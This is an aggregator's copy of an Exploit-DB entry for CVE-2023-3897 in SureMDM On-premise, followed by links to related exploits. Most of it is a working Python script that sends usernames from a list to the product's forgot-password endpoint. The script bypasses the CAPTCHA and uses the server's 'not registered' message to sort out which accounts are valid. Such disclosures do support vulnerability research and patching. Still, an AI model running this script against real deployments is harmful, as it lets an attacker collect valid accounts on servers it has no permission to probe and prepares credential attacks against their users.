[webapps] SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration
source link: https://www.exploit-db.com/exploits/51804
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
# Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration
# Date: 05/12/2023
# Exploit Author: Jonas Benjamin Friedli
# Vendor Homepage: https://www.42gears.com/products/mobile-device-management/
# Version: <= 6.31
# Tested on: 6.31
# CVE : CVE-2023-3897
import requests
import sys
def print_help():
print("Usage: python script.py [URL] [UserListFile]")
sys.exit(1)
def main():
if len(sys.argv) != 3 or sys.argv[1] == '-h':
print_help()
url, user_list_file = sys.argv[1], sys.argv[2]
try:
with open(user_list_file, 'r') as file:
users = file.read().splitlines()
except FileNotFoundError:
print(f"User list file '{user_list_file}' not found.")
sys.exit(1)
valid_users = []
bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest"
enumerate_txt = "This User ID/Email ID is not registered."
for index, user in enumerate(users):
progress = (index + 1) / len(users) * 100
print(f"Processing {index + 1}/{len(users)} users ({progress:.2f}%)", end="\r")
data = {"UserId": user}
response = requests.post(
f"{url}{bypass_dir}",
json=data,
headers={"Content-Type": "application/json; charset=utf-8"}
)
if response.status_code == 200:
response_data = response.json()
if enumerate_txt not in response_data.get('d', {}).get('message', ''):
valid_users.append(user)
print("\nFinished processing users.")
print(f"Valid Users Found: {len(valid_users)}")
for user in valid_users:
print(user)
if __name__ == "__main__":
main()
Recommend
-
10
UserEnumTeams Description Sometimes user enumeration could be sometimes useful during the reconnaissance of an assessment. This tool will determine if an email is registered on teams or not. More details on the
-
7
Disclaimer: This information is for educational purposes only. What does Captcha mean? Captcha is a security measure used to distinguish between computer and human behavior. It is al...
-
6
@jmau111jmau111Senior agnostic developer - Cybersecurity awarenessNEWABOUT PAGE
-
7
Munish Suri December 21, 2022 5 minute read
-
5
Dingtian-DT-R002 3.1.276A - Authentication Bypass ...
-
3
Bookwyrm v0.4.3 - Authentication Bypass ...
-
6
Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass
-
4
GLPI 9.5.7 - Username Enumeration ...
-
5
RWS WorldServer 11.7.3 - Session Token Enumeration ...
-
5
Ateme TITAN File 3.9 - SSRF File Enumeration ...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK